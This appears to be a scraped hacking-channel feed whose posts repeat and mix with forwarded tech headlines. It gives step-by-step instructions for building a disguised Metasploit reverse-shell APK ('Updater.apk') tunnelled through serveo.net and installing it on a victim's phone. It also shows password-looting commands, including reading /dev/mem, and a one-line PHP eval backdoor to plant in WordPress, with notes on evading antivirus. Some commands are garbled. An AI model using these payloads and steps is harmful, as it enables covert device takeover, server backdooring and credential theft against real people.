β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Hack Android Phone Using Another Android Phone?
YOU NEED :
1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)
2). TermuX Android App (Download from Play Store)
3). Installed Metasploit Framework in TermuX (tutorial here)
4). Active internet / WiFi connection
five). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")
6). MiXplorer (download the APK file from UpToDown to sign the APK)
7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)
π¦Step 1 port forwarding
Many people use NGROK for port forwarding. But in NGROK you can see that it will create a new domain or port when you reconnect to it. The reserved domain and port are unfortunately only available to paid or their premium customers. That's why for NGROK you have to generate a new APK every time you start hacking.
BUT HERE ... we will be using Serveo. In Serveo, you can manually forward the desired port on the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:
pkg install openssh
- It will install OpenSSH successfully
Once installed, just enter this:
ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net
- Details below
It might ask you about the default ssh or something like that. Just enter yes when he asks about it.
There are some points to keep in mind here; If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect the TCP port. To forward a TCP port, you must enter the same desired ports in the Desired_Ports field. Also don't change "localhost". Here we are going to forward TCP port: 4564 (for example only). After forwarding
π¦Step 2 Build an APK with an embedded payload
To generate an APK with an embedded payload, enter this command in the NEW SESSION:
msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R
> Storage / Downloads / Updater.apk
- The link to Updater.apk is in the next third paragraph
Wait a minute ...
Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk
(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.
(Remember: This APK is not signed! You must sign it before using it to avoid problems.)
π¦Step 3: Signing the newly generated APK file
To sign the newly generated APK file,
Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).
Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".
It will display various options for signing the APK (but "AUTO" is preferred).
Select AUTO to automatically and successfully sign the APK file.
Your APK file: (filename) -signed.apk is now successfully signed and fully functional and is 9.9KB in size.
π¦Step 4 Configuring Metasploit in TermuX
Activate the Metasploit Framework in TermuX by entering this command in a new session:
msfconsole
- Metasploit Framework Console
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Thanks to DUST WORLD for this fix ... !!!
Wait a minute ...
Now that msfconsole starts, type the following (bold) commands, one by one, carefully:
msf> use exploit / multi / handler
msf> install payload android / meterpreter / reverse_tcp
msf> install LHOST localhost
msf> install LPORT 4564
msf> exploit -j -z
- enter only bold commands
Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)
- (Session ID) = 1, 2, 3, 4 or 5 ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Hack Android Phone Using Another Android Phone?
YOU NEED :
1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)
2). TermuX Android App (Download from Play Store)
3). Installed Metasploit Framework in TermuX (tutorial here)
4). Active internet / WiFi connection
five). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")
6). MiXplorer (download the APK file from UpToDown to sign the APK)
7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)
π¦Step 1 port forwarding
Many people use NGROK for port forwarding. But in NGROK you can see that it will create a new domain or port when you reconnect to it. The reserved domain and port are unfortunately only available to paid or their premium customers. That's why for NGROK you have to generate a new APK every time you start hacking.
BUT HERE ... we will be using Serveo. In Serveo, you can manually forward the desired port on the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:
pkg install openssh
- It will install OpenSSH successfully
Once installed, just enter this:
ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net
- Details below
It might ask you about the default ssh or something like that. Just enter yes when he asks about it.
There are some points to keep in mind here; If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect the TCP port. To forward a TCP port, you must enter the same desired ports in the Desired_Ports field. Also don't change "localhost". Here we are going to forward TCP port: 4564 (for example only). After forwarding
π¦Step 2 Build an APK with an embedded payload
To generate an APK with an embedded payload, enter this command in the NEW SESSION:
msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R
> Storage / Downloads / Updater.apk
- The link to Updater.apk is in the next third paragraph
Wait a minute ...
Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk
(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.
(Remember: This APK is not signed! You must sign it before using it to avoid problems.)
π¦Step 3: Signing the newly generated APK file
To sign the newly generated APK file,
Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).
Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".
It will display various options for signing the APK (but "AUTO" is preferred).
Select AUTO to automatically and successfully sign the APK file.
Your APK file: (filename) -signed.apk is now successfully signed and fully functional and is 9.9KB in size.
π¦Step 4 Configuring Metasploit in TermuX
Activate the Metasploit Framework in TermuX by entering this command in a new session:
msfconsole
- Metasploit Framework Console
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Thanks to DUST WORLD for this fix ... !!!
Wait a minute ...
Now that msfconsole starts, type the following (bold) commands, one by one, carefully:
msf> use exploit / multi / handler
msf> install payload android / meterpreter / reverse_tcp
msf> install LHOST localhost
msf> install LPORT 4564
msf> exploit -j -z
- enter only bold commands
Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)
- (Session ID) = 1, 2, 3, 4 or 5 ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Many Vulnerabilities has been patched in Vmware, could allow an attacker to exploit all system.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Suddenly, Huawei's commercial desktop PC is here! Want to move the cake?
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo apt install libncurses5-dev
3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
B) For the rest Linux distros.:
1) git clone https://github.com/D4Vinci/One-Lin3r.git
2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h
F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Gives you one-liners that aids in penetration testing operations, privilege escalation and more - D4Vinci/One-Lin3r
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME LINUX TIPS :
A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
B) β οΈ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
(from git)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME LINUX TIPS :
A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
B) β οΈ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
(from git)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Entos Information & Communication launches electronic access list + face recognition heat detection solution'NARMS
#international #Technologies
#international #Technologies
Forwarded from UNDERCODE NEWS
KT HoldsβCommunication Big Data Platform Road Showβ, which gathered in one place for communication big data
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor - nil0x42/phpsploit
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
